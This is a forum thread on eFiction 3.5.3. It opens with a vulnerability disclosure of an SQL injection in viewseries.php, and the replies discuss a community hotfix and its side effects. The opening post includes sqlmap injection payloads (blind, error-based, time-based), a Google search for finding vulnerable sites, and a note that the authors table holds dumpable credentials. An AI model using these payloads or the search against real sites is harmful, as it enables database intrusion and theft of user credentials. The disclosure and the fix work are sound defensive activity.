Hello ...
The viewseries.php page in eFiction 3.5.3 is vulnerable to an SQL Injection attack.
The page loads the URL parameter "seriesid":
$seriesid = isset($_GET['seriesid']) ? $_GET['seriesid'] : false;
Then it passes the *tainted* value directly down to the database:
$parents = dbquery("SELECT s.title, s.seriesid FROM ".TABLEPREFIX."fanfiction_inseries as i,
".TABLEPREFIX."fanfiction_series as s WHERE s.seriesid = i.seriesid AND i.subseriesid = '$seriesid'");
This allows an attacker to extract information from the underlying database.
sqlmap identified the following injection points with a total of 396 HTTP(s) requests:
---
Place: GET
Parameter: seriesid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: seriesid=1' AND 9530=9530 AND 'xaMV'='xaMV
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause
Payload: seriesid=-1947' OR ROW(2257,7329)>(SELECT COUNT(*),CONCAT(0x716e656e71,(SELECT (CASE WHEN (2257=2257) THEN 1 ELSE 0 END)),0x716c746b71,FLOOR(RAND(0)*2))x FROM (SELECT 7852 UNION SELECT 4197 UNION SELECT 3571 UNION SELECT 7903)a GROUP BY x) AND 'zplx'='zplx
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: seriesid=1' AND SLEEP(5) AND 'hXxL'='hXxL
---
[20:37:41] [INFO] testing MySQL
[20:37:42] [INFO] confirming MySQL
[20:37:45] [INFO] the back-end DBMS is MySQL
[20:37:45] [INFO] fetching banner
[20:37:45] [INFO] retrieving the length of query output
[20:37:45] [INFO] retrieved: 20
[20:38:25] [INFO] retrieved: 5.1.69-community-log
[20:38:25] [INFO] actively fingerprinting MySQL
[20:38:28] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache, PHP 5.2.17
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
banner parsing fingerprint: MySQL 5.1.69, logging enabled
banner: '5.1.69-community-log'
Vulnerable sites can be found using Google by executing this search:
inurl:"viewseries.php?seriesid="
The complete list of usernames/passwords can be obtained by dumping the fanfiction_authors table.
Anybody running eFiction 3.5.3 should be advised that their user credentials are available to the public.
... Robert
I did this change but now when I click submit button everything is OK but when I want to echo inserted text, it shows between the lines "rn" (in database shows rn). I tried to remove these tags but it doesn't disapear. How could I remove these tags?
(You can skip step 2 if you know are using mysqli extension, if you are not sure, better do it.)
Step 2:
Open includes/mysqli_functions.php, find at or around line 56:// Used to escape text being put into the database.
function escapestring($str) {
if(version_compare(phpversion(),"4.3.0")=="-1") {
$str = mysql_escape_string($str);
} else {
$str = mysql_real_escape_string($str);
}
return $str;
}Modify to:
// Used to escape text being put into the database.
function escapestring($str) {
if (!is_array($str)) return mysql_real_escape_string($str);
else return array_map('escapestring', $str);
}This will no longer probe for PHP versions before 4.3.0, but honestly, this would mean your web server has not been updated since around 2003.
I couldn't find that code in includes/mysqli_functions.php but could in includes/mysql_functions.php, so was assuming there's a tiny typo in step 2 or am I wrong and my files are different than expected somehow?
Holy Batman, fired a bit too far here ^^
I changed the instructions above, in short terms: changes in the config.php modification, edit an additional file.
Thank you, now its ok
Thank you for getting on this so quick!
Series doesnt show whit
$seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;
I get error in line 39 viewseries.php.
But its ok if I use:
$seriesid = isset($_GET['seriesid']) && is_numeric($_GET['seriesid']) ? escapestring($_GET['seriesid']) : false;
I dont know if it is ok to use this last code
Whoa - thanks Robert for the quick spot and thanks Sheepie for the fix.
A quick search didn't find those lines of code in the files. There was similar code but not the same.
Please hurry up on the fixed version as at least I can upload that!
Thank you, Robert for pointing this out, and thank you, Sheepcontrol for working on the fix.
I wanted to point out that the 2 lines of code that were previously added to the config.php file, and now are listed for the dbfuctions.php file:
$_GET = array_map('stripslashes', $_GET);
$_POST = array_map('stripslashes', $_POST);
May help with the SQL injection issue, but they throw off some of the site functionality. A member of my site emailed me to let me know that when she was trying to add a challenge, the site wouldn't save the characters she was trying to tie to the challenge. I checked, and she was correct. It looks like any input that comes from a box where multiple options can be chosen is being disregarded (for ex. in the advanced search it won't use selected classtypes to include/exclude).
UPDATE: zip-archive attached with the modified files.
Updated package is postponed, also, until this fix has become somewhat stable.
Sheep, I think you are great to tackle this problem but I'm confused... is there an attachment on your post or not? I see a paperclip on the header like there is an attachment but I could find no link. I will attempt to manually alter my files, but if I do, will I screw something up? Seems like there are some unpredictable results.
******************************************
Mucking around in eFiction since circa 2001 (ver. 1.0)
Now running v.3
Darn, that's what I was fearing. Well, as I said, I don't know the code very well, ok, scratch that as well - I need to finish v5 ASAP π
Hey I'm ready to beta test v5 whenever you are ready. :agree:
******************************************
Mucking around in eFiction since circa 2001 (ver. 1.0)
Now running v.3
I'm getting a bunch of reports from authors stating that "rn" is being added to each line since I applied the hotfix. Here's an example:
http://www.adastrafanfic.com/viewstory.php?sid=2061&chapter=37
No matter what I do on the HTML editor side, I cannot remove those characters. They persist over and over.
-- jb
Archive: Ad Astra Star Trek Fanfiction Archive
Version: 3.5.3
Skin: One of Kali's, but I'm not sure. It's been heavily modded.
PHP: 7.4.27
MySQL: 5.7.36
Can I get a post of Step 3 so I can back out the changes?
-- Jb
EDIT: Nevermind. I found it and edited it out.
Archive: Ad Astra Star Trek Fanfiction Archive
Version: 3.5.3
Skin: One of Kali's, but I'm not sure. It's been heavily modded.
PHP: 7.4.27
MySQL: 5.7.36
Darn, that's what I was fearing. Well, as I said, I don't know the code very well, ok, scratch that as well - I need to finish v5 ASAP π
Hey I'm ready to beta test v5 whenever you are ready. :agree:
I'd also be up for doing any beta testing when you are ready.
http://www.FicSavers.Com
http://www.HPFanFicArchive.Com
http://www.FavoritesTracker.Org
It seems to be. Once I backed out the config.php changes, all of the weird extra characters disappeared when I did the hand-edits to the HTML input editor.
-- jb
Archive: Ad Astra Star Trek Fanfiction Archive
Version: 3.5.3
Skin: One of Kali's, but I'm not sure. It's been heavily modded.
PHP: 7.4.27
MySQL: 5.7.36
